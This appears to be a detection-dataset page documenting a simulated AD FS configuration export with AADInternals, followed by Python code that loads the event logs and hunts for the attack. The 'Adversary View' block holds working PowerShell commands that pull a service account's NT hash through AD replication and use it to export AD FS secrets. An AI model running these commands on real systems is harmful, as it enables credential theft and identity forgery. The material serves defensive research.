Export ADFS Database Configuration Remotely
Metadata

Field | Value
---|---
Contributors | Roberto Rodriguez @Cyb3rWard0g
Creation Date | 2021/04/27
Modification Date | 2021/04/27
Tactics |
Techniques |
Tags | None
Dataset Description

This dataset represents a threat actor exporting the AD FS database configuration remotely over HTTP.
Datasets Downloads

Type | Link
---|---
Host | https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/lateral_movement/host/aadinternals_export_adfsdatabaseconfig_remotely.zip
Network |
Simulation Metadata

Tools

Type | Name | Module
---|---|---
PowerShell Module | AADInternals | Export-AADIntADFSConfiguration
Adversary View

```powershell
# ADFS Service Account
$UserObjectGUID = 'd1713029-72e2-4101-8486-1db074944f23'
# Domain Admin credentials
$credentials = Get-Credential
# Get Hash via AD replication
$Hash = Get-AADIntADUserNTHash -ObjectGuid $UserObjectGUID -Credentials $credentials -Server 'DC01.blacksmith.local' -AsHex
# Retrieve AD FS database configuration over HTTP
$ADFSDatabaseConfig = Export-AADIntADFSConfiguration -Hash '97bff5626068f351a5f9891b97b04640' -SID 'S-1-5-21-3226634481-2224579835-4276826623-1103' -Server ADFS01.blacksmith.local
```
Explore Datasets

Download & Decompress Dataset

```python
import requests
from zipfile import ZipFile
from io import BytesIO

# Dataset archive published in the OTRF Security-Datasets repository
url = 'https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/lateral_movement/host/aadinternals_export_adfsdatabaseconfig_remotely.zip'
zipFileRequest = requests.get(url)
zipFileRequest.raise_for_status()
zipFile = ZipFile(BytesIO(zipFileRequest.content))
# The archive holds a single JSON-lines file; extract it to the working directory
datasetJSONPath = zipFile.extract(zipFile.namelist()[0])
```
Read JSON File

```python
import pandas as pd

# One event per line, so read it as JSON lines
df = pd.read_json(path_or_buf=datasetJSONPath, lines=True)
```
Access Security Events

```python
df.groupby(['Channel']).size().sort_values(ascending=False)
```
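To go from channel counts to a hunt over this dataset, here is an added example (not part of the original notebook) that looks for the two stages of the adversary view: the replication request against the DC that yields the service account hash (Security 4662 carrying the DS-Replication-Get-Changes rights) and a connection to the AD FS server's policy store endpoint from a host outside the farm. The policy store port (1500), the event field names, and the workstation and account names are assumptions; the sample events are constructed.

```python
import json

# Security 4662 property GUIDs for the replication rights a DCSync-style read needs
# (DS-Replication-Get-Changes and DS-Replication-Get-Changes-All).
REPLICATION_RIGHTS = ("1131f6aa-9c07-11d1-f79f-00c04fc2dcd2",
                      "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2")
ADFS_FARM = {"adfs01.blacksmith.local"}   # AD FS server named in the adversary view
ADFS_POLICY_STORE_PORT = 1500             # assumption: AD FS policy store transfer port

def load_jsonl(path):
    """Read a Security-Datasets JSON-lines file (datasetJSONPath above) into dicts."""
    with open(path, encoding="utf-8") as fh:
        return [json.loads(line) for line in fh if line.strip()]

def replication_requests(events):
    """Security 4662 events requesting replication rights: the Get-AADIntADUserNTHash step."""
    return [(e["Hostname"], e["SubjectUserName"]) for e in events
            if e.get("Channel") == "Security" and e.get("EventID") == 4662
            and any(g in e.get("Properties", "") for g in REPLICATION_RIGHTS)]

def adfs_policy_store_clients(events):
    """Sysmon 3 connections to the AD FS policy store port from hosts outside the farm."""
    hits = []
    for e in events:
        if e.get("EventID") != 3 or "Sysmon" not in e.get("Channel", ""):
            continue
        if (e.get("DestinationHostname", "").lower() in ADFS_FARM
                and e.get("DestinationPort") == ADFS_POLICY_STORE_PORT
                and e.get("Hostname", "").lower() not in ADFS_FARM):
            hits.append((e["Hostname"], e["User"], e["Image"]))
    return hits

# Constructed sample events; field names mirror the dataset layout as an assumption.
SAMPLE_EVENTS = [
    {"Channel": "Security", "EventID": 4662, "Hostname": "DC01.blacksmith.local",
     "SubjectUserName": "analyst1", "ObjectType": "domainDNS",
     "Properties": "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
    {"Channel": "Microsoft-Windows-Sysmon/Operational", "EventID": 3,
     "Hostname": "WKSTN01.blacksmith.local", "User": "BLACKSMITH\\analyst1",
     "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "DestinationHostname": "ADFS01.blacksmith.local", "DestinationPort": 1500},
    {"Channel": "Microsoft-Windows-Sysmon/Operational", "EventID": 3,  # farm-internal, benign
     "Hostname": "ADFS01.blacksmith.local", "User": "NT SERVICE\\adfssrv",
     "Image": "C:\\Windows\\ADFS\\Microsoft.IdentityServer.ServiceHost.exe",
     "DestinationHostname": "ADFS01.blacksmith.local", "DestinationPort": 1500},
]

if __name__ == "__main__":
    print("replication requests:", replication_requests(SAMPLE_EVENTS))
    print("policy store clients:", adfs_policy_store_clients(SAMPLE_EVENTS))
```

Against the real dataset, replace `SAMPLE_EVENTS` with `load_jsonl(datasetJSONPath)` and adjust the field names if the dataset's columns differ.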